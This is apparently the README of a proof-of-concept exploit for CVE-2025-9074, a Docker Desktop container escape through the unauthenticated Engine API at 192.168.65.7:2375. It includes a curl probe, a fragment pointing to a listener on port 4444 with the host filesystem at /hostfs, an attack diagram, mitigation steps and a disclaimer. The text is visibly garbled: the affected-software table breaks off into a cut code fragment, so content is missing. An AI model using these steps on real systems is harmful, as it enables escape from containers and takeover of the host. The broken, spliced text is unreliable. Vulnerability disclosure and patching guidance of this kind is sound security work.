## https://sploitus.com/exploit?id=69123871-A980-52ED-BF7E-C25EC8D54FDB
# CVE-2025-9074: Docker Desktop Container Escape PoC



Proof of Concept exploit for **CVE-2025-9074** - a critical container escape vulnerability in Docker Desktop that allows unauthenticated access to the Docker Engine API.
## Vulnerability Overview
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-9074 |
| **CVSS Score** | 9.3 (Critical) |
| **Affected Software** | Docker Desktop -p 4444
# Once connected, host filesystem is at: /hostfs
```
### From Inside a Container
```bash
# If you already have access to a container
curl http://192.168.65.7:2375/version
```
## Attack Scenario
```mermaid
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
```
## Mitigation
### Immediate Action Required
**Update to Docker Desktop 4.44.3 or later immediately.**
```bash
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
```
### Workarounds (Temporary)
If immediate update is not possible:
1. Avoid running untrusted containers
2. Monitor network connections from containers
3. Implement network segmentation
4. Review all container images before deployment
## References
- [Docker Security Advisory](https://docs.docker.com/desktop/release-notes/#4443)
- [NVD CVE-2025-9074](https://nvd.nist.gov/vuln/detail/CVE-2025-9074)
- [Felix Boulet's Blog](https://blog.qwertysecurity.com/Articles/blog3.html)
- [Philippe Dugré's Analysis](https://pvotal.tech/breaking-dockers-isolation-using-docker-cve-2025-9074/)
- [GitHub Advisory](https://github.com/advisories/GHSA-4xcq-3fjf-xfqw)
## Disclaimer
This tool is provided for **educational and authorized security testing purposes only**.
- Only use against systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The authors assume no liability for misuse of this software
## Credits
- **Vulnerability Discovery**: Felix Boulet, Philippe Dugré
- **PoC Development**: Amanja Francisco
- **Docker Security Team**: For rapid response and patch
## License
MIT License - See LICENSE file for details